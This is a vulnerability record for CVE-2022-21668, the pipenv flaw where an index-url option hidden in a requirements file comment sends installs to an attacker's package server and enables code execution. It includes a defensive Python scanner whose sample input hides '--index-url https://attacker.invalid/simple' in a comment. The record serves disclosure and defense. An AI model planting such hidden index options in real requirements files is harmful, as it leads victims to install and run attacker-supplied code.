CVE-2022-21668

Published: 10/01/2022 Updated: 07/02/2024
CVSS v2 Base Score: 9.3 | Impact Score: 10 | Exploitability Score: 8.6
CVSS v3 Base Score: 8.6 | Impact Score: 6 | Exploitability Score: 1.8
VMScore: 829
CVSS v2 Vector: AV:N/AC:M/Au:N/C:C/I:C/A:C

Vulnerability Summary

pipenv is a Python development workflow tool. Starting with version 2018.10.9 and prior to version 2022.1.8, a flaw in pipenv's parsing of requirements files allows a malicious user to insert a specially crafted string inside a comment anywhere within a requirements.txt file, which will cause victims who use pipenv to install the requirements file to download dependencies from a package index server controlled by the attacker. By embedding malicious code in packages served from their malicious index server, the attacker can trigger arbitrary remote code execution (RCE) on the victims' systems. If an attacker is able to hide a malicious `--index-url` option in a requirements file that a victim installs with pipenv, the attacker can embed arbitrary malicious code in packages served from their malicious index server that will be executed on the victim's host during installation (remote code execution/RCE). When pip installs from a source distribution, any code in the setup.py is executed by the install process. This issue is patched in version 2022.1.8. The GitHub Security Advisory contains more information about this vulnerability.
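As an added, defender-side example that is not part of this record or of pipenv's own code: a small Python check that flags index-redirecting pip options found inside comments of a requirements file, which is the shape of the flaw described above. The regex, the function names and the sample requirements text are constructed here; hostnames use the reserved `.invalid` TLD.

```python
import re
from typing import List, NamedTuple

# Options that change where pip/pipenv fetches packages from. A correct
# requirements parser ignores them after a '#'; pipenv < 2022.1.8 did not,
# so finding one inside a comment is the signal worth blocking on.
_OPTION_RE = re.compile(
    r"(?<![\w-])(--index-url|--extra-index-url|--trusted-host|--find-links|-i|-f)"
    r"(?:[=\s]+(\S+))?"
)


class Finding(NamedTuple):
    line_no: int
    option: str
    value: str
    in_comment: bool


def scan_requirements(text: str) -> List[Finding]:
    """Report every index-redirecting option in a requirements file.

    Findings with in_comment=True are the dangerous ones. The split on the
    first '#' is a simplification: '#egg=' fragments count as comments here,
    which is harmless for this check because they carry no index options.
    """
    findings: List[Finding] = []
    for line_no, raw in enumerate(text.splitlines(), start=1):
        code, _sep, comment = raw.partition("#")
        for in_comment, part in ((False, code), (True, comment)):
            for m in _OPTION_RE.finditer(part):
                findings.append(Finding(line_no, m.group(1), m.group(2) or "", in_comment))
    return findings


def is_safe_to_install(text: str) -> bool:
    """True when no index option is hidden inside a comment."""
    return not any(f.in_comment for f in scan_requirements(text))


# Constructed sample: line 3 hides an index option in a trailing comment,
# line 4 sets one openly (visible, so left to policy rather than flagged here).
SAMPLE = """requests==2.28.1
# plain comment, nothing to see
flask>=2.0  # --index-url https://attacker.invalid/simple
--extra-index-url https://mirror.example.invalid/simple
"""

if __name__ == "__main__":
    for f in scan_requirements(SAMPLE):
        print(f)
    print("safe:", is_safe_to_install(SAMPLE))
```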

Vulnerable Products

pypa pipenv

fedoraproject fedora 34

fedoraproject fedora 35

fedoraproject fedora 36

GitHub Repositories

hello_world_python: This is a demonstration of the pipenv vulnerability CVE-2022-21668 (https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21668). DO NOT USE THIS REPOSITORY. It is only for example use. To run the code run: pipenv install -r requirements.txt. This will install the packages needed to run the hello_world_python.py file. And if you're lucky it might install some

My CVE, bug bounty, and general cybersec relevant reading list and notes. Misc Links: National Vulnerability Database: here; NVD CVE search: here; NVD data feeds listing: here; CVE details CVSS distribution listing: here; Mitre CVE search: here; Pentesterland list of bug bounty writeups: here; JFrog security research blogroll: here; vuldb listing: here. 2022 March Title

CVE-2022-21668-Pipenv-RCE-vulnerability: 1 Introduction. In this document the Pipenv vulnerability (CVE-2022-21668) is discussed in detail. The following sections cover the bug code in the pipenv/utils.py file which opens up the door for various RCE attacks, and also the recent fix which validates the SSL/TLS connection and checks the hostname against a list of trusted hosts.